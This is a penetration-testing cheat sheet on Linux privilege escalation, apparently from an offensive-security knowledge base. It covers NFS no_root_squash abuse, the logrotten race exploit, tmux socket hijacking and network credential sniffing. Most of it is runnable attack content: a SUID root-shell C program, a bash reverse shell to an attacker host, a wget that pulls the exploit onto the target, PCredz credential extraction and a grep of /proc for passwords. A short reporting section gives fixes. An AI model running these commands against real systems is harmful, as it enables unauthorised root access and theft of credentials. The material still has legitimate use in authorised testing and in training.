Linux PrivEsc Misc NFS Logrotate

🛡️ Methodology Checklist

• Check NFS exports: cat /etc/exports — look for no_root_squash
• Mount NFS share from attacker, compile SUID C binary, chmod u+s
• Execute SUID binary on target to get root shell
• Check logrotate version and find writable log file with config
• Use logrotten tool to race logrotate for privilege escalation
• Check tmux sockets: ls -al /tmp/.ICE-unix/ /tmp/tmux-*
• If readable tmux socket: tmux -S [SOCKET] attach

---

🎯 Operational Context

Use when: NFS shares found with no_root_squash, or logrotate running as root with writable config/log directories — specific low-probability but high-value privesc paths. Think Dumber First: showmount -e [TARGET] from attack box — if NFS shares are exported with no_root_squash, mount the share as root on your attack box and modify files as root. Logrotate: if you can write to a log path or inject into a logrotate config, use logrotten exploit. Skip when: NFS not exposed externally and logrotate configuration is root-only-writable.

---

⚡ Tactical Cheatsheet

Command	Tactical Outcome
cat /etc/exports	Check NFS export config — look for no_root_squash
showmount -e [TARGET_IP]	List NFS exports from attacker machine
mount -t nfs [TARGET_IP]:/share /mnt/nfs	Mount NFS share on attacker machine
gcc shell.c -o shell -static	Compile SUID payload statically on attacker machine
chmod +s /mnt/nfs/shell	Set SUID bit on NFS-mounted file (works because no_root_squash)
/tmp/shell	Execute SUID binary on target for root shell
logrotate --version	Check logrotate version (3.8.6/3.11.0/3.15.0/3.18.0 = vulnerable)
ps aux | grep tmux	Find existing tmux sessions, especially root-owned
tmux -S /tmp/[SOCKET] new -s root	Attach to tmux session via socket path
ls -la /tmp/ | grep tmux	Find tmux sockets in /tmp
tcpdump -i [IFACE] -w /tmp/capture.pcap	Capture traffic to file
./PCredz -f /tmp/capture.pcap	Extract credentials from pcap
./PCredz -i [IFACE]	Live credential extraction from network interface
net-creds	Python alternative to PCredz for live capture

---

🔬 Deep Dive & Workflow

NFS no_root_squash Exploitation

# Target — check exports
cat /etc/exports
# → /var/nfs/general *(rw,no_root_squash)
# no_root_squash = remote root treated as local root (NOT squashed to nobody)
 
# On attacker machine (as root):
showmount -e [TARGET_IP]
mkdir /mnt/nfs
mount -t nfs [TARGET_IP]:/var/nfs/general /mnt/nfs
 
# Compile SUID shell
cat > /tmp/shell.c << 'EOF'
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
EOF
gcc /tmp/shell.c -o /mnt/nfs/shell -static
chmod +s /mnt/nfs/shell
# → attacker is root → file lands on NFS with SUID root ownership
 
# On target machine:
ls -la /var/nfs/general/shell   # → -rwsr-xr-x root root
/var/nfs/general/shell          # → root shell

Why it works: no_root_squash preserves the remote root UID (0). Files created/chmod’d by attacker’s root land with uid=0 and the SUID bit intact.

Unmount after: umount /mnt/nfs

Logrotate Exploitation (logrotten)

# Verify vulnerable version
logrotate --version
# Vulnerable: 3.8.6, 3.11.0, 3.15.0, 3.18.0
 
# Check if writable log file is in a logrotate config
cat /etc/logrotate.conf
ls /etc/logrotate.d/
 
# Requires: "create" directive in config + writable log file
 
# On attacker — get logrotten
git clone https://github.com/whotwagner/logrotten
cd logrotten && gcc -o logrotten logrotten.c
 
# Transfer to target
wget http://[LHOST]/logrotten -O /tmp/logrotten
chmod +x /tmp/logrotten
 
# Create payload (written to logrotate's aftercreate hook location)
echo "bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" > /tmp/payload
 
# Trigger — write to log file to force rotation
echo "trigger" >> /var/log/[LOGFILE]
 
# Run logrotten pointing at log file
/tmp/logrotten -p /tmp/payload /var/log/[LOGFILE]
# → race condition: replaces newly created log file before logrotate
# → root reads "log file" which is actually our payload → code exec as root

tmux Session Hijacking

# Find root-owned tmux sockets
ps aux | grep tmux
# → root ... tmux new-session -s root -d
# → or: tmux -S /tmp/sharesocket ...
 
find /tmp -name "*tmux*" 2>/dev/null
ls -la /tmp/ | grep tmux
 
# Attach to socket (must have r/w on socket file)
tmux -S /tmp/tmux-0/default attach
# or
TMUX=/tmp/.tmux-1000/default,0,0 tmux attach
 
# If socket is group-readable and you're in that group:
tmux -S [SOCKET_PATH] attach
# → full interactive root shell

Network Traffic Credential Capture

# Passive capture to file
tcpdump -i [IFACE] -w /tmp/capture.pcap
# Let run for a few minutes, then CTRL+C
 
# Extract credentials from capture
./PCredz -f /tmp/capture.pcap
# Finds: HTTP Basic auth, FTP, SMTP, POP3, IMAP, SNMP, NTLMv1/v2, Kerberos
 
# Live credential extraction (requires root or cap_net_raw)
./PCredz -i eth0
 
# Alternative
python3 net-creds.py -p /tmp/capture.pcap
 
# What to look for:
# - Cleartext passwords (FTP, HTTP, Telnet)
# - NTLM hashes → crack with hashcat -m 5600
# - HTTP POST with password= params

Service Internals Enumeration

# Find interesting internal processes
ps aux | grep -v "\[" | awk '{print $11}' | sort -u
 
# Trace system calls on running process
strace -p [PID] 2>&1 | grep -i "open\|read\|pass"
 
# Trace library calls
ltrace [BINARY] 2>&1 | grep -i "pass\|cred\|auth"
 
# Check /proc for process cmdline (may contain passwords)
find /proc -name cmdline 2>/dev/null | xargs strings 2>/dev/null | grep -i pass

---

🛠️ Troubleshooting & Edge Cases

Problem	Cause	Fix
NFS mount fails	RPC port blocked or nfs-common not installed	Install: apt install nfs-common; check ports: nmap -sU -p 111,2049 [TARGET]
NFS mounted but no_root_squash not set	Root squashing enabled	Files created as nobody:nogroup; cannot abuse; look for other NFS shares
Logrotten exploit fails	Wrong logrotate version	logrotten works on logrotate < 3.15.1; check: logrotate --version
NFS write blocked despite no_root_squash	Filesystem permissions	Create file as root on attack box, then chown to target user; or place SUID binary
Logrotate privesc path not writable	Config in /etc/logrotate.d/ requires root	Look for app-specific logrotate configs in writable directories like /opt or /var/app/

---

📝 Reporting Trigger

Finding Title: NFS no_root_squash Misconfiguration Enables Privilege Escalation Impact: NFS share exported with no_root_squash allows an attacker with access to the NFS server to mount the share from their own system as root and place SUID binaries or modify privileged files, achieving root access on the target system. Root Cause: NFS export configured with no_root_squash option, disabling root privilege restriction for remote mounts. Recommendation: Enable root_squash on all NFS exports (default behavior). Restrict NFS access to authorized client IPs. Consider replacing NFS with a more secure file sharing protocol. Audit all NFS exports for security misconfigurations.

---

🔗 Related Nodes

• Linux_PrivEsc_Enumeration
• Linux_PrivEsc_Services_Cron
• Linux_PrivEsc_Methodology
• Linux_PrivEsc_Quick_Reference